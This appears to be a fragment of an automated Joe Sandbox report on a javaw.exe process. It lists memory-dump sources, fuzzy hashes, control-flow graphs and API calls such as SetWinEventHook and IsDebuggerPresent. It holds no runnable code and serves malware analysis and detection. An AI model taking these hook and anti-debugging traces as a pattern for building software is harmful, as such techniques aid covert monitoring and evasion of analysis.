                                                                                                                                                                                                                                    • API ID: Window$Text$ForegroundLength_free_malloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2076420077-0
                                                                                                                                                                                                                                    • Opcode ID: 250df6807f5aa68ca11d9b9b82472a74057f27a548b58697db85e82021af406b
                                                                                                                                                                                                                                    • Instruction ID: 8911bbd4a205cb1926ad8cb1e21092d766858f0de3d6ca0f2e53cfc2fe4d55d8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 250df6807f5aa68ca11d9b9b82472a74057f27a548b58697db85e82021af406b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D101D8B76002056FE301ABA5DCC6E6B77ADEB992547244176F849FB300DA31AD0687B0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.0000000002974000.00000040.00000800.00020000.00000000.sdmp, Offset: 02974000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_2974000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 944949145b264f30a99e85031fdd02ffdd17d8a8cb892109ff3d55352820b60a
                                                                                                                                                                                                                                    • Instruction ID: 6c2c5a7e9c5260a3999de8bd764624cbcec2741b6aa1502ec02a9bed6017ea18
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 944949145b264f30a99e85031fdd02ffdd17d8a8cb892109ff3d55352820b60a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDD12A71A09340CFD718CF29C08462ABBF2FF89314F6589AEE4999B355C735E842CB81
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 40b64f28f167f68212fac72df23b5bd7f6d34c85fb3b9ae36ed3452e5e954c21
                                                                                                                                                                                                                                    • Instruction ID: 2241c4cd07e8d49c8cc2448bb087a31be0df9999d580a4da81420da8eaf5b629
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40b64f28f167f68212fac72df23b5bd7f6d34c85fb3b9ae36ed3452e5e954c21
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AA18B7EA04601DFEB18CF64C494BA9FBB1FF49318F088599D9198B381C775B849CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5ec467a0234221d1ebdea17edc97c9b97bcd18c75aefbd2e92e779568deb68de
                                                                                                                                                                                                                                    • Instruction ID: f8818de6427b026d3459f8ce4c83d728cca139f96f48dbbcd226ac4b6fa32afa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ec467a0234221d1ebdea17edc97c9b97bcd18c75aefbd2e92e779568deb68de
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B619C7E604601EFEB18CF24C494BAAF7B1FB49718F18859DD8198B381C774B859CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d0000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: d61c110d2cda61784ef97d3302bc2e76e4668c41f83201132fff20d6976a7cc2
                                                                                                                                                                                                                                    • Instruction ID: 6f7d3693d1664c0c0633b3360a2958ca67c6aed545bc7165ca07c3b51a1d65ae
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d61c110d2cda61784ef97d3302bc2e76e4668c41f83201132fff20d6976a7cc2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92114CBED0022A9FCF28DF49C8854ADB7B0FB98314F158525EC69E7342D7346924CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 301 28d0651-28d0653 302 28d06be-28d06cb 301->302 303 28d0655-28d0669 301->303 304 28d06cd-28d06d3 302->304 305 28d06c2-28d06cb 302->305 303->302 314 28d06d5 call 28dec1c 304->314 315 28d06d5 call 28e4ccd 304->315 316 28d06d5 call 28e49aa 304->316 317 28d06d5 call 2979712 304->317 318 28d06d5 call 28e4b78 304->318 319 28d06d5 call 28e45e9 304->319 320 28d06d5 call 28e3c76 304->320 321 28d06d5 call 28e6495 304->321 305->304 305->305 306 28d06d7-28d06e0 307 28d070f-28d0714 306->307 308 28d06e6-28d06e9 306->308 309 28d06fa-28d070e 307->309 310 28d06ef-28d06f2 308->310 311 28d0716-28d071a 308->311 312 28d071c-28d0720 310->312 313 28d06f8 310->313 311->309 312->309 313->309 314->306 315->306 316->306 317->306 318->306 319->306 320->306 321->306
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d0000_javaw.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 331 28e4ccd-28e4ce9 332 28e4cf4-28e4d38 331->332
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 322 28d0722-28d0736 324 28d070f-28d0714 322->324 325 28d06e6-28d06e9 322->325 326 28d06fa-28d070e 324->326 327 28d06ef-28d06f2 325->327 328 28d0716-28d071a 325->328 329 28d071c-28d0720 327->329 330 28d06f8 327->330 328->326 329->326 330->326
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d0000_javaw.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 333 28e4b78-28e4b93 334 28e4b9e-28e4be2 333->334
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 337 28e6495-28e64af 338 28e64ba-28e64fe 337->338
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 335 28dec1c-28dec36 336 28dec41-28dec85 335->336
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 339 28e6575-28e658f 340 28e659a-28e65de 339->340
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c4d6ede4df22ed28e6a61ad64b43f83331f48f438addc4d0d6ec43f91a244377
                                                                                                                                                                                                                                    • Instruction ID: 9ce4e75b9550efaff36bf7f84a272f9d3bfd691912597f95217d6bbf07f7d2e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4d6ede4df22ed28e6a61ad64b43f83331f48f438addc4d0d6ec43f91a244377
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBF09BBAA04B06EBDB25CF65C0047CAFBB4BB88714F54421AC82C67360D778B469CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 343 28dda35-28dda4f 344 28dda5a-28dda8e 343->344
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dac0adea2164b57c8f98350b3893088a6493ae25fd927d35c7e5b1f82a723661
                                                                                                                                                                                                                                    • Instruction ID: 0514eeac2f882e8144a06f308a670891b6ced1f5c50dcd9716ea586a76ff2583
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dac0adea2164b57c8f98350b3893088a6493ae25fd927d35c7e5b1f82a723661
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CF0C2BAD00A06ABDB248F61C4047DAFBB4BB44714F14461AC52C67320D378B465CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3212301fbd1168627394636bf04e2b83f60ec090e87d484d826d803c2137708b
                                                                                                                                                                                                                                    • Instruction ID: 02be0bfb1e0edba82ff556477aff5ac6bad686b5f35d8a28ed98c4eb955c2059
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3212301fbd1168627394636bf04e2b83f60ec090e87d484d826d803c2137708b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07F0CABAD00A06ABDB248FA1C1047CAFBB4BB88714F14421AC42CA7320D378B469CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b21991b550f69292e1797f0c3ea01ff8d36b2cab92e345ad66c058859c314c17
                                                                                                                                                                                                                                    • Instruction ID: d30022a559b61266d59c7d6168b1a6e81228c5dec2af6b1e40f8f66746cc3008
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b21991b550f69292e1797f0c3ea01ff8d36b2cab92e345ad66c058859c314c17
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FF0CABAD00A06ABDB248F61C0047CAFBB4BB88714F14821AC42CA7320C778B469CBD0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 341 28db407-28db421 342 28db42c-28db460 341->342
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 95132434b22da91c44bbfba5c853d2d17ddce52e9f221a166011d795ad46bb54
                                                                                                                                                                                                                                    • Instruction ID: d1cd31d9ee4e7ca339561fafc302fb9cf246d12be67a23d54c8e1e20ee2e383e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95132434b22da91c44bbfba5c853d2d17ddce52e9f221a166011d795ad46bb54
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CF0C2BAD00A06ABDB248F61C0047CAFBB4BB84714F15421AC42C67360D778B465CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: afaff73caae5e9dcd08b1b8a8883f79c0bc40e5facc9ab49b5048c509180e4b2
                                                                                                                                                                                                                                    • Instruction ID: 6e57ddfe296dda9c084663e650e8c21fd4346f6fc47db8788726572ba6a54ead
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afaff73caae5e9dcd08b1b8a8883f79c0bc40e5facc9ab49b5048c509180e4b2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0C2BAD00A06ABDB248F61C0047CAFBB4BB44714F14461AC42C67320D378B465CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c456b815d39efec36ad594203489c3fd33b2d6f85c8ead2d735003ee7e67c5d4
                                                                                                                                                                                                                                    • Instruction ID: 0b9ee0c5c76e840b1d2463884bd5e1de8841105afc498b194122f06e169c9ab0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c456b815d39efec36ad594203489c3fd33b2d6f85c8ead2d735003ee7e67c5d4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6F0C2BAD00A06ABDB248FA1C0047CAFBB4BB44714F14461AC52C67320D378B465CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetWinEventHook.USER32(00000003,00000003,00000000,73A91020,00000000,00000000,00000000), ref: 73A91139
                                                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 73A9115E
                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 73A91176
                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 73A9117C
                                                                                                                                                                                                                                    • _wprintf.LIBCMT ref: 73A91183
                                                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 73A9119E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$DispatchEventHookTranslate_wprintf
                                                                                                                                                                                                                                    • String ID: asdasdasdasdasdsdasd
                                                                                                                                                                                                                                    • API String ID: 1774198118-1471917671
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 73A91716
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 73A9172B
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(73A98180), ref: 73A91736
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 73A91752
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 73A91759
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.0000000002974000.00000040.00000800.00020000.00000000.sdmp, Offset: 02974000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_2974000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.0000000002974000.00000040.00000800.00020000.00000000.sdmp, Offset: 02974000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_2974000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A9338E
                                                                                                                                                                                                                                    • __mtterm.LIBCMT ref: 73A9339A
                                                                                                                                                                                                                                      • Part of subcall function 73A93065: DecodePointer.KERNEL32(0000000A,73A914CA,73A914B0,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93076
                                                                                                                                                                                                                                      • Part of subcall function 73A93065: TlsFree.KERNEL32(00000022,73A914CA,73A914B0,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93090
                                                                                                                                                                                                                                      • Part of subcall function 73A93065: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,73A914CA,73A914B0,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93F06
                                                                                                                                                                                                                                      • Part of subcall function 73A93065: _free.LIBCMT ref: 73A93F09
                                                                                                                                                                                                                                      • Part of subcall function 73A93065: DeleteCriticalSection.KERNEL32(00000022,?,?,73A914CA,73A914B0,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93F30
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 73A933B0
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 73A933BD
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 73A933CA
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 73A933D7
                                                                                                                                                                                                                                    • TlsAlloc.KERNEL32(?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93427
                                                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93442
                                                                                                                                                                                                                                    • __init_pointers.LIBCMT ref: 73A9344C
                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A9345D
                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A9346A
                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93477
                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93484
                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(Function_000031E9,?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A934A5
                                                                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 73A934BA
                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A934D4
                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 73A934E6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
